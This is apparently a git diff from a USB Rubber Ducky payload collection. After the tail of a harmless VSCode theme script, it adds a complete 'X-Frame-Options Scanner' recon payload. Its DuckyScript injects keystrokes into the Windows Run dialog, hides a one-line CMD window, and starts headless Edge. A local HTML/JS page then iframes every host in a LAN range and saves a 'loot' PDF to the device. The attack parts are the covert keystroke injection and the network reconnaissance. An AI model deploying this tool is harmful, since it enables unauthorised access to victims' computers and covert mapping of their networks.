|
||||
|
||||
REM Open VSCode
|
||||
COMMAND SPACE
|
||||
STRING Visual Studio Code
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 300
|
||||
|
||||
REM Open settings
|
||||
COMMAND ,
|
||||
DELAY 200
|
||||
REM Look for "theme"
|
||||
STRING theme
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 200
|
||||
|
||||
REM Tab to the first result
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
REM Open the theme dropdown
|
||||
ENTER
|
||||
ENTER
|
||||
DELAY 200
|
||||
|
||||
REM Note: There is also a key combinations to open a theme dropdown, however on that dropdown if you press down at the end it will go back up, so you canot be certain what mode is selected.
|
||||
|
||||
REM Select light mode
|
||||
DO_DOWNS()
|
||||
ENTER
|
||||
|
||||
DELAY 100
|
||||
REM Close the settings window
|
||||
COMMAND w
|
|
@ -0,0 +1,69 @@
|
|||
# "X-Frame-Options" Scanner
|
||||
|
||||
- Title: "X-Frame-Options" Scanner
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Category: Recon
|
||||
|
||||
## Description
|
||||
|
||||
Uses the "Microsoft Edge" web browser to search for web servers within
|
||||
a range of IPv4 addresses that do not have an "X-Frame-Options" header.
|
||||
|
||||
Then exports the results to a PDF file accessible in the Rubber Ducky.
|
||||
|
||||
The results contain the tested IPv4 addresses and the HTML rendering.
|
||||
|
||||
## Tested On
|
||||
|
||||
>
|
||||
> Microsoft Edge (Windows 10)
|
||||
>
|
||||
|
||||
| X-Frame-Options | Encryption | Detectable |
|
||||
| --- | --- | --- |
|
||||
| None | None | Yes |
|
||||
| Set to SAMEORIGIN | None | No |
|
||||
| Set to SAMEORIGIN | Self-Signed Certificate | No |
|
||||
|
||||
__NOTE :__ *All cases could not be tested.*
|
||||
|
||||
## Configuration
|
||||
|
||||
In the "payload.txt" file, replace the values of the following constants :
|
||||
|
||||
```
|
||||
|
||||
REM ---
|
||||
REM USB Rubber Ducky label.
|
||||
REM ---
|
||||
DEFINE #RD_LABEL DUCKY
|
||||
|
||||
REM ---
|
||||
REM Format of an allowed IPv4 address range.
|
||||
REM 192.168.0.X-192.168.0.Y where (X < Y)
|
||||
REM ---
|
||||
DEFINE #LAN 192.168.0.1-192.168.0.50
|
||||
|
||||
```
|
||||
|
||||
## Advanced Configuration
|
||||
|
||||
In the "main.js" file available in the "recon_files/assets/js/" directory,
|
||||
you can add new ports to be tested for each host :
|
||||
|
||||
```js
|
||||
if (LAN) {
|
||||
Promise.all(
|
||||
[
|
||||
...,
|
||||
recon('http', 8080),
|
||||
recon('https', 8443)
|
||||
]
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
## Usage
|
||||
|
||||
At the root of the USB Rubber Ducky, copy the "recon_files/" folder.
|
|
@ -0,0 +1,40 @@
|
|||
REM TITLE : "X-Frame-Options" Scanner
|
||||
REM AUTHOR : TW-D
|
||||
REM TARGET : Microsoft Edge
|
||||
REM VERSION : 1.0
|
||||
REM CATEGORY : Recon
|
||||
REM REQUIREMENT : DuckyScript 3.0
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 10000
|
||||
|
||||
REM ---
|
||||
REM USB Rubber Ducky label.
|
||||
REM ---
|
||||
DEFINE #RD_LABEL DUCKY
|
||||
|
||||
REM ---
|
||||
REM Format of an allowed IPv4 address range.
|
||||
REM 192.168.0.X-192.168.0.Y where (X < Y)
|
||||
REM ---
|
||||
DEFINE #LAN 192.168.0.1-192.168.0.50
|
||||
|
||||
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||
|
||||
IF ( $_CAPSLOCK_ON ) THEN
|
||||
CAPSLOCK
|
||||
DELAY 500
|
||||
END_IF
|
||||
|
||||
IF ( $_NUMLOCK_ON == FALSE ) THEN
|
||||
NUMLOCK
|
||||
DELAY 500
|
||||
END_IF
|
||||
|
||||
GUI r
|
||||
DELAY 1500
|
||||
STRINGLN CMD /K "MODE CON:COLS=18 LINES=1 && FOR /F %d IN ('WMIC Volume GET DriveLetter^, Label^|FINDSTR "#RD_LABEL"') DO @SET RD_LABEL=%d"
|
||||
DELAY 2000
|
||||
STRINGLN START MSEDGE --headless --disable-gpu --run-all-compositor-stages-before-draw --print-to-pdf="%RD_LABEL%\loot_%RANDOM%.pdf" "%RD_LABEL%\recon_files\index.html?lan=#LAN" && EXIT
|
||||
|
||||
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
@ -0,0 +1,25 @@
|
|||
body {
|
||||
margin: 0;
|
||||
}
|
||||
|
||||
h1, #url {
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
#url {
|
||||
font-size: small;
|
||||
border-width: 1px;
|
||||
border-style: solid;
|
||||
border-color: white;
|
||||
color: whitesmoke;
|
||||
padding: 1vh 0 1vh 0;
|
||||
background-color: lightslategray;
|
||||
}
|
||||
|
||||
iframe {
|
||||
min-width: 100vw;
|
||||
max-width: 100vw;
|
||||
min-height: 98vh;
|
||||
max-height: 98vh;
|
||||
border-style: none;
|
||||
}
|
|
@ -0,0 +1,2 @@
|
|||
const LAN = (new URLSearchParams(document.location.search).get('lan'));
|
||||
const OUTPUT = document.querySelector('#output');
|
|
@ -0,0 +1,15 @@
|
|||
async function recon(scheme, port) {
|
||||
for (let target of targets()) {
|
||||
let url, div, iframe;
|
||||
url = (scheme + '://' + target + ':' + port + '/');
|
||||
div = document.createElement('div');
|
||||
div.id = 'url';
|
||||
div.innerText = url;
|
||||
iframe = document.createElement('iframe');
|
||||
iframe.sandbox = 'allow-same-origin allow-scripts';
|
||||
iframe.src = url;
|
||||
OUTPUT.appendChild(div);
|
||||
OUTPUT.appendChild(iframe);
|
||||
await sleep();
|
||||
}
|
||||
}
|
|
@ -0,0 +1,7 @@
|
|||
function sleep() {
|
||||
return(
|
||||
new Promise(
|
||||
resolve => setTimeout(resolve, 1250)
|
||||
)
|
||||
);
|
||||
}
|
|
@ -0,0 +1,18 @@
|
|||
function targets() {
|
||||
let bounds, wholes, hosts;
|
||||
bounds = LAN.split('-');
|
||||
wholes = [bounds[0].split('.'), bounds[1].split('.')];
|
||||
hosts = [parseInt(wholes[0].pop()), parseInt(wholes[1].pop())];
|
||||
wholes = [wholes[0].join('.'), wholes[1].join('.')];
|
||||
if (wholes[0] === wholes[1]) {
|
||||
let whole, targets;
|
||||
whole = wholes[0];
|
||||
targets = new Array();
|
||||
for (let host = hosts[0]; host <= hosts[1]; host++) {
|
||||
targets.push(whole + '.' + host);
|
||||
}
|
||||
return(targets);
|
||||
} else {
|
||||
return(new Array());
|
||||
}
|
||||
}
|
|
@ -0,0 +1,8 @@
|
|||
if (LAN) {
|
||||
Promise.all(
|
||||
[
|
||||
recon('http', 80),
|
||||
recon('https', 443)
|
||||
]
|
||||
);
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<link rel="stylesheet" type="text/css" href="./assets/css/style.css?version=1.0.0" />
|
||||
</head>
|
||||
<body>
|
||||
<main>
|
||||
<section>
|
||||
<h1>X-FRAME-OPTIONS Scanner</h1>
|
||||
<div id="output"></div>
|
||||
</section>
|
||||
</main>
|
||||
<script type="text/javascript" src="./assets/js/constants.js?version=1.0.0"></script>
|
||||
<script type="text/javascript" src="./assets/js/functions/targets.js?version=1.0.0"></script>
|
||||
<script type="text/javascript" src="./assets/js/functions/sleep.js?version=1.0.0"></script>
|
||||
<script type="text/javascript" src="./assets/js/functions/recon.js?version=1.0.0"></script>
|
||||
<script type="text/javascript" src="./assets/js/main.js?version=1.0.0"></script>
|
||||
</body>
|
||||
</html>
|
Loading…
Reference in New Issue